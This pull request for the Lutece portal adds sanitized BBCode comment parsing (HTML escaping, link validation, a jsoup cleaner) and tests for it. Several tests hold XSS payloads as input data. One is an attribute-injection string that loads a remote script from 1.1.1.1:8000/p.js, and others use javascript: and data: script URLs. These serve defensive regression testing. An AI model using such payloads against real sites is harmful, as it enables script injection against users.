### PR TITLE
LUT-33216 : Secure BBCode comment parsing

### DIFF
--- a/src/java/fr/paris/lutece/portal/service/editor/EditorBbcodeService.java
+++ b/src/java/fr/paris/lutece/portal/service/editor/EditorBbcodeService.java
@@ -37,10 +37,14 @@ import fr.paris.lutece.portal.business.editor.ParserComplexElement;
 import fr.paris.lutece.portal.business.editor.ParserElement;
 import fr.paris.lutece.portal.service.util.AppLogService;
 import fr.paris.lutece.portal.service.util.AppPropertiesService;
+import fr.paris.lutece.portal.web.xss.FieldValidationService;
 import fr.paris.lutece.util.parser.BbcodeUtil;
-
 import org.apache.commons.lang3.StringUtils;
+import org.apache.commons.text.StringEscapeUtils;
 import org.jsoup.Jsoup;
+import org.jsoup.nodes.Document;
+import org.jsoup.nodes.Element;
+import org.jsoup.safety.Cleaner;
 import org.jsoup.safety.Safelist;
 
 import java.util.ArrayList;
@@ -71,6 +75,9 @@ public class EditorBbcodeService implements IEditorBbcodeService
     private static final String PROPERTY_EDITOR_BBCODE_ELEMENT_PATH = "editors.parser.bbcode.element";
     private static final String PROPERTY_PARSER_ELEMENTS = "editors.parser.bbcode.elements";
     private static final String PROPERTY_PARSER_COMPLEX_ELEMENTS = "editors.parser.bbcode.complexElements";
+    private static final String INVALID_URL = "invalid_url";
+    private static final String SELECTOR_LINK_WITH_HREF = "a[href]";
+    private static final String ATTRIBUTE_HREF = "href";
     private static final String SEPARATOR = ",";
     private static EditorBbcodeService _singleton;
     private static List<ParserElement> _listParserElement;
@@ -94,6 +101,34 @@ public class EditorBbcodeService implements IEditorBbcodeService
             return "Error occurred during processing. Please try again later.";
         }
     }
+
+    /**
+     * Parse a comment as BBCode and return safe HTML.
+     *
+     * @param strValue the comment text
+     * @return the parsed and sanitized comment
+     */
+    public String parseComment( String strValue )
+    {
+        if ( strValue == null || strValue.isBlank( ) )
+        {
+            return strValue;
+        }
+
+        try
+        {
+            Document document = Jsoup.parseBodyFragment( BbcodeUtil.parse( escapeHtml( strValue ), _listParserElement, _listParserComplexElement ) );
+            validateUrls( document );
+
+            return new Cleaner( Safelist.basicWithImages( ) ).clean( document ).body( ).html( );
+        }
+        catch ( Exception e )
+        {
+            AppLogService.error( "Error occurred while parsing and cleaning the comment", e );
+            return "Error occurred during processing. Please try again later.";
+        }
+    }
+
     /**
      * {@inheritDoc}
      */
@@ -194,6 +229,44 @@ public class EditorBbcodeService implements IEditorBbcodeService
 
                 _listParserComplexElement.add( new ParserComplexElement( strTagName, strOpenSubstWithParam, strCloseSubstWithParam, strOpenSubstWithoutParam,
                         strCloseSubstWithoutParam, strInternalSubst, bProcessInternalTags, bAcceptParam, bRequiresQuotedParam ) );
+            }
+        }
+    }
+
+    /**
+     * Escapes user supplied values before BBCode substitutions can insert them
+     * into HTML attributes.
+     *
+     * @param value
+     *            the user supplied value
+     * @return the HTML escaped value
+     */
+    private String escapeHtml( String value )
+    {
+        return StringEscapeUtils.escapeHtml4( value )
+                .replace( "'", "&#39;" );
+    }
+
+    /**
+     * Validates the {@code href} attribute of every link in the document. Invalid links are unwrapped so that their
+     * text remains visible without creating a clickable URL.
+     *
+     * @param document
+     *            the parsed BBCode HTML document to update
+     */
+    private void validateUrls( Document document )
+    {
+        for ( Element link : document.select( SELECTOR_LINK_WITH_HREF ) )
+        {
+            String strValidatedUrl = FieldValidationService.validateUrl( link.attr( ATTRIBUTE_HREF ) );
+            if ( INVALID_URL.equals( strValidatedUrl ) )
+            {
+                link.text( "[Url invalid]");
+                link.unwrap( );
+            }
+            else
+            {
+                link.attr( ATTRIBUTE_HREF, strValidatedUrl );
             }
         }
     }

--- a/src/test/java/fr/paris/lutece/portal/service/editor/EditorBbcodeServiceTest.java
+++ b/src/test/java/fr/paris/lutece/portal/service/editor/EditorBbcodeServiceTest.java
@@ -1,0 +1,141 @@
+/*
+ * Copyright (c) 2002-2025, City of Paris
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ *  1. Redistributions of source code must retain the above copyright notice
+ *     and the following disclaimer.
+ *
+ *  2. Redistributions in binary form must reproduce the above copyright notice
+ *     and the following disclaimer in the documentation and/or other materials
+ *     provided with the distribution.
+ *
+ *  3. Neither the name of 'Mairie de Paris' nor 'Lutece' nor the names of its
+ *     contributors may be used to endorse or promote products derived from
+ *     this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+ * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+ * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+ * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+ * POSSIBILITY OF SUCH DAMAGE.
+ *
+ * License 1.0
+ */
+package fr.paris.lutece.portal.service.editor;
+
+import java.io.File;
+
+import org.jsoup.Jsoup;
+
+import fr.paris.lutece.portal.service.util.AppPropertiesService;
+import fr.paris.lutece.portal.service.util.AppPathService;
+import junit.framework.TestCase;
+
+/**
+ * Tests for {@link EditorBbcodeService} comment parsing.
+ */
+public class EditorBbcodeServiceTest extends TestCase
+{
+    @Override
+    protected void setUp( ) throws Exception
+    {
+        File webappDirectory = new File( "webapp" ).getAbsoluteFile( );
+        AppPathService.init( webappDirectory.getPath( ) );
+        AppPropertiesService.init( "/WEB-INF/conf/" );
+    }
+
+    /**
+     * A plain-text comment is preserved unchanged.
+     */
+    public void testParseCommentKeepsPlainText( )
+    {
+        String strComment = "testOK";
+
+        assertEquals( strComment, EditorBbcodeService.getInstance( ).parseComment( strComment ) );
+    }
+
+    /**
+     * BBCode remains available in comments.
+     */
+    public void testParseCommentRendersBbcode( )
+    {
+        assertEquals( "Comment <b>important</b>", EditorBbcodeService.getInstance( ).parseComment( "Comment [b]important[/b]" ) );
+    }
+
+    /**
+     * A null comment is preserved without invoking the parser.
+     */
+    public void testParseCommentHandlesNullValue( )
+    {
+        assertNull( EditorBbcodeService.getInstance( ).parseComment( null ) );
+    }
+
+    /**
+     * An empty comment remains empty.
+     */
+    public void testParseCommentKeepsEmptyValue( )
+    {
+        assertEquals( "", EditorBbcodeService.getInstance( ).parseComment( "" ) );
+    }
+
+    /**
+     * An attribute-injection payload in a BBCode link has its link removed while its text is preserved.
+     */
+    public void testParseCommentRejectsAttributeInjectionPayload( )
+    {
+        assertInvalidUrlIsUnwrapped( "y' autofocus onfocus ='import(`//1.1.1.1`+String.fromCharCode(58)+`8000/p.js`)" );
+    }
+
+    /**
+     * Raw HTML must be retained as text instead of being interpreted as markup.
+     */
+    public void testParseCommentEscapesRawHtml( )
+    {
+        String strResult = EditorBbcodeService.getInstance( ).parseComment( "<script>alert('x')</script>" );
+
+        assertFalse( strResult.contains( "<script" ) );
+        assertFalse( strResult.contains( "</script>" ) );
+        assertTrue( Jsoup.parseBodyFragment( strResult ).text( ).contains( "alert('x'" ) );
+    }
+
+    /**
+     * Links using a dangerous scheme or malformed markup must have their link removed.
+     */
+    public void testParseCommentRejectsInvalidUrls( )
+    {
+        String [ ] invalidUrls = {
+                "javascript:alert(1)",
+                "data:text/html,<script>alert(1)</script>",
+                "https://example.org/?q=<script>"
+        };
+
+        for ( String strUrl : invalidUrls )
+        {
+            assertInvalidUrlIsUnwrapped( strUrl );
+        }
+    }
+
+    /**
+     * Asserts that an invalid BBCode URL no longer creates a link while keeping its text visible.
+     *
+     * @param strUrl
+     *            the invalid URL
+     */
+    private void assertInvalidUrlIsUnwrapped( String strUrl )
+    {
+        String strResult = EditorBbcodeService.getInstance( ).parseComment( "[url]" + strUrl + "[/url]" );
+
+        assertTrue( Jsoup.parseBodyFragment( strResult ).select( "a" ).isEmpty( ) );
+        assertEquals( strUrl, Jsoup.parseBodyFragment( strResult ).text( ) );
+    }
+}


### PR DESCRIPTION
Add a parsing method dedicated for comments (to avoid regression on actual parsing).
This method validate html link or remove bad html format. We keep the same sanitizer with  jsoup.